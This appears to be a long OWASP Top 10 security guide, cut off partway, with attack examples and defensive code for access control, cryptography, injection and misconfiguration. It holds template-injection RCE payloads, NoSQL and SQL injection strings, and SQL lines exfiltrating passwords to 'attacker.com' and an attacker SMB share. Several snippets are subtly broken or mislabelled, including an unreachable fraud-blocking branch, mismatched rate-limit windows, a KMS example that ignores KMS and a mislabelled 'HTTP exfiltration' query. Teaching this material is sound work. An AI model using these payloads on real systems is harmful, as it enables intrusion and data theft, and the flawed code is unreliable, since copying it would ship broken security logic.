The OWASP Top 10 represents not just a checklist of vulnerabilities, but a fundamental shift in how we approach application security. From its inception in 2003 to the 2026 edition, the evolution reflects the changing attack surfaces—from simple SQL injection to complex business logic flaws and supply chain attacks. This comprehensive guide examines each vulnerability through multiple lenses: theoretical foundations, advanced detection methodologies, exploitation patterns, defensive architectures, and forensic investigation techniques.
Broken access control represents the most severe and prevalent vulnerability in modern applications, accounting for 94% of applications tested with some form of access control flaw. The fundamental issue stems from the confusion between authentication and authorization—systems that verify "who you are" but fail to consistently check "what you're allowed to do."
Modern applications implement authorization at four distinct levels:
- User Interface (UI) Level: Hiding buttons/links from unauthorized users
- API/Endpoint Level: Server-side validation of requested resources
- Business Logic Level: Contextual permission checks
- Data/Object Level: Individual record access validation
Failure most commonly occurs between layers 1-2 (UI hides but API allows) and layers 3-4 (general permission but not specific object permission).
GraphQL Authorization Bypasses
# Original query (requires authorization)
query {
user(id: "123") {
email
paymentMethods {
lastFour
}
}
}
# Attack: Query introspection to discover hidden fields
query {
__schema {
types {
name
fields {
name
type {
name
}
}
}
}
}
# Direct query to discovered admin-only fields
query {
adminUsers {
id
apiKeys
internalNotes
}
}JWT Claim Manipulation Attacks JSON Web Tokens with flawed validation enable sophisticated attacks:
- Algorithm Confusion:
"alg": "none"or RS256 to HS256 switching - Key ID Injection: Manipulating
kidheader to point to attacker-controlled key - Claim Tampering: Modifying
role,scope, orpermissionsclaims - Timing Attacks: Exploiting clock skew between token validation servers
Mass Assignment Vulnerabilities APIs that automatically bind request parameters to objects often enable privilege escalation:
POST /api/users/update-profile
Content-Type: application/json
{
"name": "Attacker",
"email": "attacker@evil.com",
"role": "admin", // Should not be settable by user
"isActive": true,
"balance": 999999
}Horizontal Privilege Escalation Testing Matrix
-
Parameter Manipulation
- Numeric IDs:
/api/user/456→/api/user/457 - UUIDs: Check for predictable patterns or leaked UUIDs
- Usernames:
/api/profile/attacker→/api/profile/victim - Email addresses: Common in password reset endpoints
- Numeric IDs:
-
HTTP Method Testing
- GET endpoints often have different authorization than POST/PUT/DELETE
- Test every method on every endpoint:
GET /api/admin/users → 403 Forbidden (expected) POST /api/admin/users → 201 Created (unexpected!)
-
State-Based Authorization Testing
- Document states and transitions
- Test out-of-order transitions
- Example: Purchase flow bypass
Step 1: Add to cart → /cart/add Step 2: Enter shipping → /checkout/shipping Step 3: Payment → /checkout/payment Step 4: Confirm → /checkout/confirm Attack: Skip to /checkout/confirm without payment
Vertical Privilege Escalation via Role Inheritance Modern RBAC systems with role inheritance create subtle vulnerabilities:
# Role hierarchy
admin:
- manage_users
- view_audit_logs
moderator:
- manage_content
- view_reports
user:
- create_content
- view_content
# Vulnerability: Admin inherits user permissions
# Attack: Find user-only endpoints, access with admin token
# Some endpoints may only check "isAdmin" not "hasPermission"# Advanced ABAC implementation
class AccessPolicy:
def evaluate(self, user, resource, action, context):
# Multi-dimensional evaluation
rules = [
# Time-based restrictions
TimeRule("09:00-17:00", "business_hours_only"),
# Location-based restrictions
IPRule(allowed_networks=["10.0.0.0/8"]),
# Resource-specific rules
ResourceOwnerRule(user, resource),
# Custom business logic
lambda u, r, a, c: (
r.sensitivity == "high" and
u.clearance >= "confidential"
),
# Rate limiting integration
RateLimitRule(action, user, limit=100/hour),
]
return all(rule.evaluate(user, resource, action, context)
for rule in rules)// Centralized policy enforcement
@RestController
public class UserController {
@Autowired
private PolicyDecisionPoint pdp;
@GetMapping("/users/{userId}/documents/{docId}")
public Document getDocument(@PathVariable String userId,
@PathVariable String docId) {
// Query PDP with full context
AuthorizationContext context = AuthorizationContext.builder()
.subject(SecurityContext.getUser())
.resource(new DocumentResource(docId))
.action("read")
.environment(EnvContext.getCurrent())
.build();
if (!pdp.isAuthorized(context)) {
throw new AccessDeniedException();
}
return documentService.getDocument(docId);
}
}Log Analysis for Authorization Failures
-- Detect suspicious access patterns
SELECT
user_id,
COUNT(DISTINCT accessed_resource) as unique_resources,
COUNT(CASE WHEN status_code = 403 THEN 1 END) as denied_attempts,
COUNT(CASE WHEN status_code = 200 THEN 1 END) as successful_accesses,
MIN(timestamp) as first_attempt,
MAX(timestamp) as last_attempt
FROM access_logs
WHERE timestamp > NOW() - INTERVAL '1 hour'
GROUP BY user_id
HAVING
denied_attempts > 10 OR
unique_resources > 100 OR
(successful_accesses / NULLIF(denied_attempts, 0)) < 0.1 -- High failure rate
ORDER BY denied_attempts DESC;-
Quantum Computing Threats
- RSA-2048: Vulnerable to Shor's algorithm (theoretical)
- ECC-256: Similarly vulnerable
- AES-256: Still secure with Grover's algorithm (halved key strength)
-
Side-Channel Attacks
- Timing attacks on string comparison
- Power analysis on hardware security modules
- Cache timing attacks (Spectre/Meltdown variants)
- Acoustic cryptanalysis
-
Cryptographic Agility Failures
- Hardcoded algorithms with no migration path
- Lack of protocol negotiation mechanisms
- Version pinning attacks
TLS/SSL Deep Inspection
# Comprehensive TLS testing with testssl.sh
testssl.sh --parallel --html --json --logfile audit.html \
--server-preference --protocols --ciphers \
--vulnerabilities --headers https://target.com
# Check for specific vulnerabilities
openssl s_client -connect target.com:443 -tls1_2 \
-cipher 'ECDHE-RSA-AES128-GCM-SHA256' \
-servername target.com | openssl x509 -text
# Automated misconfiguration detection
sslscan --show-certificate --show-ciphers --show-sigalgs \
--show-curves --no-failed target.com:443Storage Encryption Assessment Matrix
| Storage Type | Common Flaws | Detection Method |
|---|---|---|
| Database Fields | ECB mode, same IV, no authentication | Analyze ciphertext patterns, identical values |
| File System | Weak keys, key storage in config files | Strings analysis, configuration review |
| Backup Files | No encryption, hardcoded passwords | Backup process analysis, restore testing |
| Memory | Plaintext secrets in memory dumps | Process memory analysis with volatility |
| Cloud Storage | Public buckets, weak IAM policies | Bucket enumeration, policy analysis |
Key Management Anti-Patterns
# BAD: Hardcoded keys
SECRET_KEY = "my-super-secret-key-12345" # In source code
# BAD: Key in environment variable (visible in errors)
import os
key = os.environ.get("ENCRYPTION_KEY") # Leaks in stack traces
# BAD: Weak key derivation
from hashlib import sha256
key = sha256(b"password").digest() # No salt, no iterations
# GOOD: Hardware-backed key management
import boto3
from cryptography.fernet import Fernet
kms = boto3.client('kms')
response = kms.generate_data_key(
KeyId='alias/encryption-key',
KeySpec='AES_256'
)
cipher = Fernet(
Fernet.generate_key() # Local key encrypted with KMS key
)Advanced Hash Function Vulnerabilities
-
Length Extension Attacks
# Vulnerable: SHA-256 without HMAC hash = sha256(secret + message) # Attack: Append data without knowing secret # Attacker can compute hash(secret || message || padding || append)
-
Algorithm Confusion in JWT
# Server expects RS256 (asymmetric) header = {"alg": "RS256", "typ": "JWT"} # Attack: Change to HS256 (symmetric) header = {"alg": "HS256", "typ": "JWT"} # Use public key as HMAC secret
public class CryptographyManager {
private Map<String, CryptoProvider> providers;
private KeyRotationSchedule rotationSchedule;
public EncryptedData encrypt(String algorithm, byte[] data) {
CryptoProvider provider = providers.get(algorithm);
// Check if algorithm is deprecated
if (rotationSchedule.isDeprecated(algorithm)) {
// Auto-rotate to new algorithm
algorithm = rotationSchedule.getCurrentAlgorithm();
provider = providers.get(algorithm);
// Re-encrypt old data in background
scheduleReEncryption(algorithm);
}
// Generate metadata for future migration
CryptoMetadata metadata = CryptoMetadata.builder()
.algorithm(algorithm)
.keyVersion(provider.getKeyVersion())
.timestamp(Instant.now())
.iv(provider.generateIV())
.build();
byte[] ciphertext = provider.encrypt(data);
return new EncryptedData(ciphertext, metadata);
}
public byte[] decrypt(EncryptedData encryptedData) {
CryptoMetadata metadata = encryptedData.getMetadata();
// Support multiple algorithm versions
CryptoProvider provider = providers.getOrDefault(
metadata.getAlgorithm(),
getFallbackProvider(metadata)
);
return provider.decrypt(
encryptedData.getCiphertext(),
metadata
);
}
}# Post-quantum cryptography with hybrid approach
from cryptography.hazmat.primitives.asymmetric import ec, rsa
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
from pqcrypto.kem.kyber1024 import generate_keypair, encrypt, decrypt
class HybridEncryption:
def __init__(self):
# Traditional cryptography (current protection)
self.ec_key = ec.generate_private_key(ec.SECP384R1())
# Post-quantum cryptography (future protection)
self.pq_public_key, self.pq_private_key = generate_keypair()
def encrypt_hybrid(self, plaintext: bytes) -> HybridCiphertext:
# Generate ephemeral key pair
ephemeral_ec = ec.generate_private_key(ec.SECP384R1())
# Perform two key exchanges
# 1. ECDH key exchange
ecdh_shared = ephemeral_ec.exchange(
ec.ECDH(),
self.ec_key.public_key()
)
# 2. Kyber key encapsulation
pq_ciphertext, pq_shared = encrypt(self.pq_public_key)
# Combine both shared secrets
combined_secret = HKDF(
algorithm=hashes.SHA512(),
length=64,
salt=None,
info=b'hybrid-kem'
).derive(ecdh_shared + pq_shared)
# Use first 32 bytes for AES key, next 32 for HMAC
aes_key = combined_secret[:32]
hmac_key = combined_secret[32:]
# Encrypt with AES-GCM
iv = os.urandom(12)
cipher = AES.new(aes_key, AES.MODE_GCM, nonce=iv)
ciphertext, tag = cipher.encrypt_and_digest(plaintext)
return HybridCiphertext(
ephemeral_pubkey=ephemeral_ec.public_key(),
pq_ciphertext=pq_ciphertext,
iv=iv,
ciphertext=ciphertext,
tag=tag,
hmac_key=hmac_key
)Memory Analysis for Key Recovery
import volatility.plugins as plugins
import volatility.utils as utils
class KeyRecoveryPlugin(plugins. Plugin):
def calculate(self):
# Scan process memory for key patterns
addr_space = utils.load_as(self._config)
# Common key patterns
patterns = [
b'AES', b'RSA', b'BEGIN.*PRIVATE KEY',
b'[0-9a-f]{64}', # 32-byte hex key
b'[A-Za-z0-9+/=]{44}', # Base64 encoded 32-byte key
]
for proc in self.list_processes():
proc_space = proc.get_process_address_space()
for vad in proc.VADs:
try:
data = proc_space.zread(vad.Start, vad.Length)
for pattern in patterns:
matches = re.finditer(pattern, data)
for match in matches:
# Extract potential key material
context = self.extract_context(
data, match.start(), 512
)
yield (proc, vad, match, context)
except:
continueNoSQL Injection Evolution
// MongoDB injection examples
// Classic injection
db.users.find({
username: req.body.username,
password: req.body.password
});
// Attack: $ne operator
{
"username": {"$ne": ""},
"password": {"$ne": ""}
}
// JavaScript injection via $where
db.users.find({
$where: `function() {
return this.username == '${req.body.username}' &&
this.password == '${req.body.password}'
}`
});
// Attack: RCE via $where
{
"$where": "function() { return true; }"
}Template Injection (SSTI) Matrix
| Template Engine | Payload | Impact |
|---|---|---|
| Jinja2 | {{config}} {{''.__class__}} |
Information disclosure, RCE |
| Freemarker | <#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")} |
RCE |
| Velocity | #set($x=$class.inspect("java.lang.Runtime").type.getRuntime().exec("id")) |
RCE |
| Thymeleaf | __${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x |
RCE |
| Handlebars | Limited by design | Context escape only |
Advanced SQL Injection Techniques
Time-Based Blind SQLi with Conditional Branching
-- Traditional time-based
SELECT IF(1=1, SLEEP(5), 0)
-- Advanced: Conditional errors for faster extraction
SELECT CASE
WHEN SUBSTRING(database(),1,1)='a'
THEN 1/0
ELSE 1
END
-- Stacked queries exploitation (when allowed)
SELECT * FROM users; DROP TABLE logs; --Out-of-Band Data Exfiltration
-- DNS exfiltration
SELECT LOAD_FILE(CONCAT('\\\\', (SELECT password FROM users LIMIT 1), '.attacker.com\\test'))
-- HTTP exfiltration via XMLHTTP
SELECT EXTRACTVALUE(1, CONCAT(0x3a, (SELECT password FROM users LIMIT 1)))
-- SMB capture
SELECT * INTO OUTFILE '\\\\attacker\\share\\data.txt'Context-Aware Input Validation Framework
class InputValidator:
VALIDATION_CONTEXTS = {
'sql_identifier': r'^[a-zA-Z_][a-zA-Z0-9_]*$',
'sql_literal': {
'string': lambda x: re.match(r"^[^'\\]*(?:\\.[^'\\]*)*$", x),
'numeric': lambda x: x.isdigit(),
'boolean': lambda x: x in ('TRUE', 'FALSE', '1', '0')
},
'html_safe': {
'text': HTML_ESCAPE_REGEX,
'attribute': ATTRIBUTE_ESCAPE_REGEX,
'url': URL_VALIDATION_REGEX
},
'os_command': {
'filename': FILENAME_REGEX,
'path': SAFE_PATH_REGEX,
'argument': SAFE_ARGUMENT_REGEX
}
}
def validate(self, input_data, context, constraints=None):
"""
Advanced validation with context awareness
"""
# Step 1: Identify context
validation_rules = self.VALIDATION_CONTEXTS.get(context)
if not validation_rules:
raise ValueError(f"Unknown context: {context}")
# Step 2: Apply grammar-based validation
if isinstance(validation_rules, dict):
# Complex context with sub-contexts
subcontext = self.detect_subcontext(input_data)
rule = validation_rules.get(subcontext)
else:
rule = validation_rules
# Step 3: Validate
if callable(rule):
return rule(input_data)
elif isinstance(rule, str):
return bool(re.match(rule, input_data))
# Step 4: Apply constraints
if constraints:
return self.apply_constraints(input_data, constraints)
return True
def detect_subcontext(self, input_data):
"""
Heuristic detection of input sub-context
"""
# Analyze input characteristics
if input_data.startswith(('http://', 'https://')):
return 'url'
elif '/' in input_data or '\\' in input_data:
return 'path'
elif any(c in input_data for c in ['<', '>', '"', "'"]):
return 'html'
else:
return 'text'AST-Based SQL Injection Detection
import sqlparse
from sqlparse.sql import Comparison, Identifier, Parenthesis
class SQLInjectionDetector:
def analyze_query(self, query: str, params: dict) -> RiskAssessment:
"""
Parse SQL and analyze for injection patterns
"""
parsed = sqlparse.parse(query)
findings = []
for statement in parsed:
# Check for tautologies
findings.extend(self.detect_tautologies(statement))
# Check for stacked queries
findings.extend(self.detect_stacked_queries(statement))
# Check for union attacks
findings.extend(self.detect_union_attacks(statement))
# Check for blind injection patterns
findings.extend(self.detect_blind_patterns(statement))
# Check parameter usage
findings.extend(self.analyze_parameter_usage(statement, params))
return RiskAssessment(
query=query,
findings=findings,
risk_level=self.calculate_risk_level(findings)
)
def detect_tautologies(self, statement):
"""
Detect always-true conditions
"""
tautologies = []
# Find WHERE clauses
where_tokens = self.find_tokens(statement, 'WHERE')
for where in where_tokens:
# Look for comparisons
comparisons = where.tokens[1].tokens
for token in comparisons:
if isinstance(token, Comparison):
left, operator, right = token
# Check for 1=1, 'a'='a', etc.
if self.is_tautology(left, operator, right):
tautologies.append({
'type': 'tautology',
'location': token.pos,
'pattern': str(token)
})
return tautologiesSafe Query Builder with DSL
from typing import Protocol, Generic, TypeVar
from dataclasses import dataclass
T = TypeVar('T')
class SafeQueryBuilder(Generic[T]):
def __init__(self, model: Type[T]):
self.model = model
self._conditions = []
self._params = {}
self._param_counter = 0
def where(self, condition: 'Condition') -> 'SafeQueryBuilder':
"""
Type-safe where condition builder
"""
param_name = f"p{self._param_counter}"
self._param_counter += 1
# Generate safe SQL with parameter placeholder
sql, value = condition.to_sql(param_name)
self._conditions.append(sql)
self._params[param_name] = value
return self
def build(self) -> Tuple[str, dict]:
"""
Build safe parameterized query
"""
query = f"SELECT * FROM {self.model._table_name}"
if self._conditions:
query += " WHERE " + " AND ".join(self._conditions)
return query, self._params
class Condition(Protocol):
def to_sql(self, param_name: str) -> Tuple[str, Any]:
...
@dataclass
class Equals:
column: str
value: Any
def to_sql(self, param_name: str):
return f"{self.column} = :{param_name}", self.value
@dataclass
class In:
column: str
values: List[Any]
def to_sql(self, param_name: str):
placeholders = [f":{param_name}_{i}"
for i in range(len(self.values))]
sql = f"{self.column} IN ({', '.join(placeholders)})"
params = {f"{param_name}_{i}": value
for i, value in enumerate(self.values)}
return sql, params
# Usage
query_builder = SafeQueryBuilder(User) \
.where(Equals("username", "admin")) \
.where(In("status", ["active", "pending"]))
sql, params = query_builder.build()
# SELECT * FROM users WHERE username = :p0 AND status IN (:p1_0, :p1_1)Context-Aware Escaping System
class ContextAwareEscaper:
ESCAPE_FUNCTIONS = {
'html_text': html.escape,
'html_attribute': lambda x: x.replace('"', '"'),
'javascript_string': json.dumps,
'css_value': cssutils.serialize,
'sql_identifier': lambda x: f'`{x.replace("`", "``")}`',
'sql_literal_string': lambda x: f"'{x.replace(\"'\", \"''\")}'",
'os_argument': shlex.quote,
'ldap_filter': ldap.filter.escape_filter_chars,
'xpath': xpath.escape,
}
CONTEXT_DETECTION_RULES = [
(r'^SELECT.*WHERE.*=.*$', 'sql_literal'),
(r'^<[^>]+>.*</[^>]+>$', 'html_text'),
(r'^onclick=".*"$', 'javascript_string'),
(r'^background: url\(.*\)$', 'css_value'),
]
def escape(self, data: str, context: str = None) -> str:
"""
Escape data based on context or auto-detect
"""
if context is None:
context = self.detect_context(data)
escape_func = self.ESCAPE_FUNCTIONS.get(context)
if escape_func is None:
raise ValueError(f"No escape function for context: {context}")
return escape_func(data)
def detect_context(self, data: str) -> str:
"""
Heuristically detect the most likely context
"""
for pattern, context in self.CONTEXT_DETECTION_RULES:
if re.search(pattern, data, re.IGNORECASE | re.DOTALL):
return context
# Default to HTML text for web applications
return 'html_text'Web Application Firewall with Behavioral Analysis
class BehavioralWAF:
def __init__(self):
self.request_baselines = {}
self.injection_patterns = self.load_patterns()
self.ml_model = self.load_ml_model()
def analyze_request(self, request: HttpRequest) -> ThreatScore:
"""
Multi-layered injection detection
"""
score = 0
# Layer 1: Pattern matching
pattern_score = self.pattern_matching(request)
score += pattern_score
# Layer 2: Behavioral analysis
behavioral_score = self.behavioral_analysis(request)
score += behavioral_score
# Layer 3: Machine learning
ml_score = self.ml_analysis(request)
score += ml_score
# Layer 4: Context-aware analysis
context_score = self.context_analysis(request)
score += context_score
return ThreatScore(
total=score,
components={
'pattern': pattern_score,
'behavioral': behavioral_score,
'ml': ml_score,
'context': context_score
}
)
def behavioral_analysis(self, request):
"""
Analyze request behavior against baseline
"""
client_id = self.get_client_id(request)
baseline = self.request_baselines.get(client_id, {})
anomalies = []
# Check parameter count anomalies
expected_params = baseline.get('param_count', {})
current_params = len(request.params)
if abs(current_params - expected_params.get('mean', 0)) > 3 * expected_params.get('std', 0):
anomalies.append('parameter_count_anomaly')
# Check value length anomalies
for param, value in request.params.items():
baseline_len = baseline.get('param_lengths', {}).get(param, {})
if baseline_len:
expected_mean = baseline_len.get('mean', 0)
expected_std = baseline_len.get('std', 1)
if abs(len(value) - expected_mean) > 3 * expected_std:
anomalies.append(f'length_anomaly_{param}')
# Check character distribution
for param, value in request.params.items():
char_dist = self.character_distribution(value)
baseline_dist = baseline.get('char_dist', {}).get(param, {})
if baseline_dist:
divergence = self.kl_divergence(char_dist, baseline_dist)
if divergence > 1.0: # Threshold
anomalies.append(f'distribution_anomaly_{param}')
return len(anomalies) * 10 # Score based on anomaly countThreat Modeling Methodologies
-
STRIDE Per Element
- Spoofing: Authentication mechanisms per component
- Tampering: Data integrity controls per data flow
- Repudiation: Logging and auditing per transaction
- Information Disclosure: Encryption and access controls
- Denial of Service: Availability and resilience design
- Elevation of Privilege: Authorization architecture
-
DREAD Risk Assessment
- Damage Potential: 0-10
- Reproducibility: 0-10
- Exploitability: 0-10
- Affected Users: 0-10
- Discoverability: 0-10
Business Logic Attack Taxonomy
| Attack Category | Example | Impact |
|---|---|---|
| Workflow Bypass | Skip payment step | Financial loss |
| Race Conditions | Double-spend attack | Resource exhaustion |
| State Manipulation | Change order status | Unauthorized access |
| Parameter Tampering | Negative price | Financial loss |
| Time-Based Attacks | Expired session reuse | Session hijacking |
Business Logic Testing Framework
class BusinessLogicTester:
def __init__(self, application_model):
self.model = application_model
self.state_machine = self.build_state_machine()
self.test_cases = self.generate_test_cases()
def build_state_machine(self):
"""
Build finite state machine from application model
"""
states = {}
transitions = {}
# Parse API endpoints and workflows
for endpoint in self.model.endpoints:
from_state = endpoint.required_state
to_state = endpoint.result_state
if from_state not in transitions:
transitions[from_state] = []
transitions[from_state].append({
'action': endpoint.action,
'to_state': to_state,
'constraints': endpoint.constraints
})
return {
'states': states,
'transitions': transitions,
'initial_state': 'start',
'final_states': ['complete', 'canceled', 'failed']
}
def generate_test_cases(self):
"""
Generate business logic test cases
"""
test_cases = []
# 1. State bypass tests
for target_state in self.state_machine['final_states']:
test_cases.extend(
self.generate_state_bypass_tests(target_state)
)
# 2. Race condition tests
test_cases.extend(self.generate_race_condition_tests())
# 3. Parameter manipulation tests
test_cases.extend(self.generate_parameter_tests())
# 4. Workflow manipulation tests
test_cases.extend(self.generate_workflow_tests())
return test_cases
def generate_state_bypass_tests(self, target_state):
"""
Generate tests that try to reach target state without proper sequence
"""
tests = []
# Find all paths to target state
paths = self.find_all_paths(
self.state_machine['initial_state'],
target_state
)
# Generate bypass attempts
for path in paths:
# Try skipping each step
for i in range(len(path)):
bypass_path = path[:i] + path[i+1:]
test = {
'type': 'state_bypass',
'path': bypass_path,
'expected': 'should_fail',
'description': f'Bypass step {i} to reach {target_state}'
}
tests.append(test)
return tests
def generate_race_condition_tests(self):
"""
Generate race condition test scenarios
"""
tests = []
# Identify non-idempotent operations
non_idempotent_endpoints = [
ep for ep in self.model.endpoints
if not ep.idempotent
]
for endpoint in non_idempotent_endpoints:
# Test parallel execution
test = {
'type': 'race_condition',
'endpoint': endpoint,
'concurrent_requests': 10,
'delay_between': '0ms',
'expected': 'consistent_state',
'description': f'Race condition on {endpoint.name}'
}
tests.append(test)
return testsAutomated Threat Modeling
class AutomatedThreatModeler:
def __init__(self, architecture_diagram):
self.diagram = architecture_diagram
self.components = self.extract_components()
self.data_flows = self.extract_data_flows()
self.trust_boundaries = self.extract_trust_boundaries()
def analyze(self):
"""
Perform comprehensive threat analysis
"""
threats = []
# Analyze each component
for component in self.components:
threats.extend(self.analyze_component(component))
# Analyze data flows
for flow in self.data_flows:
threats.extend(self.analyze_data_flow(flow))
# Analyze trust boundaries
for boundary in self.trust_boundaries:
threats.extend(self.analyze_trust_boundary(boundary))
return self.prioritize_threats(threats)
def analyze_component(self, component):
"""
STRIDE analysis per component
"""
threats = []
# Spoofing threats
if component.has_authentication:
threats.append({
'component': component.name,
'threat': 'Spoofing',
'description': f'Authentication bypass on {component.name}',
'mitigation': 'Multi-factor authentication, strong session management'
})
# Tampering threats
if component.processes_sensitive_data:
threats.append({
'component': component.name,
'threat': 'Tampering',
'description': f'Data tampering on {component.name}',
'mitigation': 'Digital signatures, hash verification'
})
# Information Disclosure
if component.stores_secrets:
threats.append({
'component': component.name,
'threat': 'Information Disclosure',
'description': f'Secret leakage from {component.name}',
'mitigation': 'Encryption at rest, proper key management'
})
return threats
def analyze_data_flow(self, flow):
"""
Analyze threats in data flows
"""
threats = []
# Check encryption in transit
if not flow.encrypted:
threats.append({
'flow': f'{flow.source} -> {flow.destination}',
'threat': 'Information Disclosure',
'description': 'Data transmitted in cleartext',
'severity': 'High',
'mitigation': 'Enable TLS 1.2+ with strong ciphers'
})
# Check authentication
if flow.crosses_trust_boundary and not flow.authenticated:
threats.append({
'flow': f'{flow.source} -> {flow.destination}',
'threat': 'Spoofing',
'description': 'Unauthenticated cross-boundary communication',
'severity': 'High',
'mitigation': 'Mutual TLS, API tokens, or client certificates'
})
return threatsAnti-Fraud Pattern Implementation
class FraudDetectionSystem:
def __init__(self):
self.rules_engine = RulesEngine()
self.ml_engine = MLEngine()
self.behavior_baselines = {}
self.shared_intelligence = ThreatIntelligenceFeed()
def evaluate_transaction(self, transaction):
"""
Multi-layered fraud detection
"""
risk_score = 0
# Layer 1: Rule-based detection
rule_violations = self.rules_engine.evaluate(transaction)
risk_score += len(rule_violations) * 10
# Layer 2: ML-based anomaly detection
ml_score = self.ml_engine.predict(transaction)
risk_score += ml_score
# Layer 3: Behavioral analysis
behavioral_score = self.analyze_behavior(transaction)
risk_score += behavioral_score
# Layer 4: Threat intelligence
intel_score = self.check_threat_intelligence(transaction)
risk_score += intel_score
# Layer 5: Velocity checking
velocity_score = self.check_velocity(transaction)
risk_score += velocity_score
# Decision making
if risk_score > 100:
return self.challenge_transaction(transaction)
elif risk_score > 200:
return self.block_transaction(transaction)
else:
return self.allow_transaction(transaction)
def analyze_behavior(self, transaction):
"""
Behavioral fingerprint analysis
"""
user_id = transaction.user_id
# Get or create baseline
baseline = self.behavior_baselines.get(user_id)
if not baseline:
baseline = self.create_baseline(user_id)
self.behavior_baselines[user_id] = baseline
# Calculate behavioral deviation
deviations = []
# Time pattern deviation
expected_time = baseline.get('typical_hours', set())
transaction_hour = transaction.timestamp.hour
if transaction_hour not in expected_time:
deviations.append('unusual_time')
# Device fingerprint deviation
current_fingerprint = self.create_device_fingerprint(
transaction.user_agent,
transaction.ip_address,
transaction.screen_resolution
)
if current_fingerprint != baseline.get('device_fingerprint'):
deviations.append('new_device')
# Transaction pattern deviation
transaction_pattern = {
'amount': transaction.amount,
'recipient': transaction.recipient,
'category': transaction.category
}
similarity = self.calculate_similarity(
transaction_pattern,
baseline.get('transaction_patterns', [])
)
if similarity < 0.3: # Low similarity threshold
deviations.append('unusual_pattern')
return len(deviations) * 15Rate Limiting with Adaptive Algorithms
class AdaptiveRateLimiter:
def __init__(self):
self.windows = {
'second': 60,
'minute': 3600,
'hour': 86400,
'day': 604800
}
self.adaptive_thresholds = {}
self.suspicious_patterns = {}
def is_rate_limited(self, key, endpoint):
"""
Adaptive rate limiting decision
"""
# Get current request pattern
pattern = self.get_request_pattern(key, endpoint)
# Check against multiple time windows
for window_name, window_seconds in self.windows.items():
count = self.get_request_count(key, endpoint, window_seconds)
# Adaptive threshold based on behavior
threshold = self.get_adaptive_threshold(
key, endpoint, window_name
)
if count >= threshold:
# Check if this is a suspicious pattern
if self.is_suspicious_pattern(pattern):
# Aggressive limiting for suspicious patterns
self.record_suspicious_activity(key, endpoint)
return True
# Normal rate limit hit
return True
return False
def get_adaptive_threshold(self, key, endpoint, window):
"""
Calculate adaptive threshold based on historical behavior
"""
baseline_key = f"{endpoint}:{window}"
if baseline_key not in self.adaptive_thresholds:
# Initial threshold
return self.get_default_threshold(window)
baseline = self.adaptive_thresholds[baseline_key]
# Adjust based on time of day
hour = datetime.now().hour
if 0 <= hour < 6: # Night hours
threshold = baseline * 0.5 # Lower threshold
elif 9 <= hour < 17: # Business hours
threshold = baseline * 1.5 # Higher threshold
else:
threshold = baseline
# Adjust based on recent suspicious activity
suspicious_count = self.get_suspicious_count(key, '24h')
if suspicious_count > 0:
threshold = threshold / (suspicious_count + 1)
return max(threshold, self.get_minimum_threshold(window))Configuration Drift Analysis Configuration drift occurs when running systems gradually diverge from their known, secure baseline. This happens through:
- Manual hotfixes applied directly to production
- Emergency changes without documentation
- Patch accumulation creating inconsistent states
- Configuration leakage through backup files
Cloud-Specific Misconfigurations
# AWS CloudFormation vulnerable template
Resources:
PublicS3Bucket:
Type: AWS::S3::Bucket
Properties:
AccessControl: PublicRead # BAD: Public access
VersioningConfiguration:
Status: Enabled
OverlyPermissiveLambda:
Type: AWS::IAM::Role
Properties:
AssumeRolePolicyDocument:
Version: '2012-10-17'
Statement:
- Effect: Allow
Principal:
Service: lambda.amazonaws.com
Action: sts:AssumeRole
Policies:
- PolicyName: root
PolicyDocument:
Version: '2012-10-17'
Statement:
- Effect: Allow
Action: "*" # BAD: Wildcard permission
Resource: "*"
ExposedSecurityGroup:
Type: AWS::EC2::SecurityGroup
Properties:
GroupDescription: Allow SSH from anywhere
SecurityGroupIngress:
- IpProtocol: tcp
FromPort: 22
ToPort: 22
CidrIp: 0.0.0.0/0 # BAD: SSH open to internetAutomated Configuration Scanning Framework
class ConfigurationScanner:
def __init__(self):
self.checkers = self.load_checkers()
self.baselines = self.load_baselines()
self.compliance_frameworks = {
'CIS': self.load_cis_benchmarks(),
'NIST': self.load_nist_controls(),
'PCI-DSS': self.load_pci_requirements()
}
def scan_web_server(self, server_config):
"""
Comprehensive web server configuration audit
"""
findings = []
# 1. HTTP Headers Analysis
headers_findings = self.analyze_headers(server_config.headers)
findings.extend(headers_findings)
# 2. TLS Configuration
tls_findings = self.analyze_tls(server_config.ssl)
findings.extend(tls_findings)
# 3. Directory and File Permissions
permission_findings = self.analyze_permissions(server_config.paths)
findings.extend(permission_findings)
# 4. Module and Feature Analysis
module_findings = self.analyze_modules(server_config.modules)
findings.extend(module_findings)
# 5. Logging Configuration
logging_findings = self.analyze_logging(server_config.logging)
findings.extend(logging_findings)
return self.prioritize_findings(findings)
def analyze_headers(self, headers):
"""
Analyze security headers
"""
required_headers = {
'Strict-Transport-Security': {
'required': True,
'min_age': 31536000, # 1 year
'include_subdomains': True,
'preload': False
},
'X-Frame-Options': {
'required': True,
'values': ['DENY', 'SAMEORIGIN']
},
'X-Content-Type-Options': {
'required': True,
'values': ['nosniff']
},
'Content-Security-Policy': {
'required': True,
'strict_default': True
},
'X-Permitted-Cross-Domain-Policies': {
'required': False,
'values': ['none']
},
'Referrer-Policy': {
'required': True,
'values': ['no-referrer', 'strict-origin-when-cross-origin']
},
'Permissions-Policy': {
'required': True,
'restricted_features': [
'geolocation', 'camera', 'microphone'
]
}
}
findings = []
for header_name, requirements in required_headers.items():
header_value = headers.get(header_name)
if requirements['required'] and not header_value:
findings.append({
'severity': 'High',
'type': 'missing_header',
'header': header_name,
'description': f'Missing required security header: {header_name}'
})
elif header_value:
# Validate header value
if 'values' in requirements:
if header_value not in requirements['values']:
findings.append({
'severity': 'Medium',
'type': 'invalid_header_value',
'header': header_name,
'current_value': header_value,
'recommended': requirements['values'],
'description': f'Invalid value for {header_name}'
})
return findings
def analyze_tls(self, ssl_config):
"""
Comprehensive TLS configuration analysis
"""
findings = []
# Protocol versions
if 'SSLv2' in ssl_config.protocols or 'SSLv3' in ssl_config.protocols:
findings.append({
'severity': 'Critical',
'type': 'weak_protocol',
'protocol': 'SSLv2/SSLv3',
'description': 'Deprecated SSL protocols enabled'
})
if 'TLSv1.0' in ssl_config.protocols:
findings.append({
'severity': 'High',
'type': 'weak_protocol',
'protocol': 'TLSv1.0',
'description': 'TLS 1.0 is deprecated and insecure'
})
# Cipher suites
weak_ciphers = [
'NULL', 'EXPORT', 'RC4', 'DES', '3DES',
